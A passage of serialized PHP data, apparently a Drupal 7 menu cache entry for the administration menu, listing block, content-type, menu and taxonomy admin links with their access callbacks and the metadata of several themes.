;s:22:\"a:1:{i:0;s:5:\"seven\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:5:\"Seven\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:144;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"144\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/list/stark\";s:11:\"router_path\";s:32:\"admin/structure/block/list/stark\";s:10:\"link_title\";s:5:\"Stark\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"144\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2062:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:22:\"a:1:{i:0;s:5:\"stark\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:5:\"Stark\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:155;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"155\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/manage/%/%\";s:11:\"router_path\";s:32:\"admin/structure/block/manage/%/%\";s:10:\"link_title\";s:15:\"Configure block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:175;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"175\";s:4:\"plid\";s:3:\"155\";s:9:\"link_path\";s:42:\"admin/structure/block/manage/%/%/configure\";s:11:\"router_path\";s:42:\"admin/structure/block/manage/%/%/configure\";s:10:\"link_title\";s:15:\"Configure block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:3:\"175\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:176;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"176\";s:4:\"plid\";s:3:\"155\";s:9:\"link_path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:11:\"router_path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:10:\"link_title\";s:12:\"Delete block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:3:\"176\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:59:\"a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:12:\"Delete block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:394;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"394\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:39:\"admin/structure/block/list/multipurpose\";s:11:\"router_path\";s:39:\"admin/structure/block/list/multipurpose\";s:10:\"link_title\";s:18:\"Multipurpose Theme\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"394\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:3186:\"a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:47:\"sites/all/themes/multipurpose/multipurpose.info\";s:4:\"name\";s:12:\"multipurpose\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:30:\"a:1:{i:0;s:12:\"multipurpose\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:18:\"Multipurpose Theme\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:395;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"395\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:44:\"admin/structure/block/list/responsive_bartik\";s:11:\"router_path\";s:44:\"admin/structure/block/list/responsive_bartik\";s:10:\"link_title\";s:17:\"Responsive Bartik\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"395\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:3220:\"a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"responsive_bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:17:\"Responsive Bartik\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:36;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"36\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/types\";s:11:\"router_path\";s:21:\"admin/structure/types\";s:10:\"link_title\";s:13:\"Content types\";s:7:\"options\";s:142:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"36\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:19:\"node_overview_types\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/types\";s:5:\"title\";s:13:\"Content types\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:47;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"47\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:20:\"admin/structure/menu\";s:11:\"router_path\";s:20:\"admin/structure/menu\";s:10:\"link_title\";s:5:\"Menus\";s:7:\"options\";s:136:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:18:\"menu_overview_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:5:\"Menus\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:57;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"57\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:24:\"admin/structure/taxonomy\";s:11:\"router_path\";s:24:\"admin/structure/taxonomy\";s:10:\"link_title\";s:8:\"Taxonomy\";s:7:\"options\";s:117:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"57\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer taxonomy\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/structure/taxonomy\";s:5:\"title\";s:8:\"Taxonomy\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:67:\"Manage tagging, categorization, and classification of your 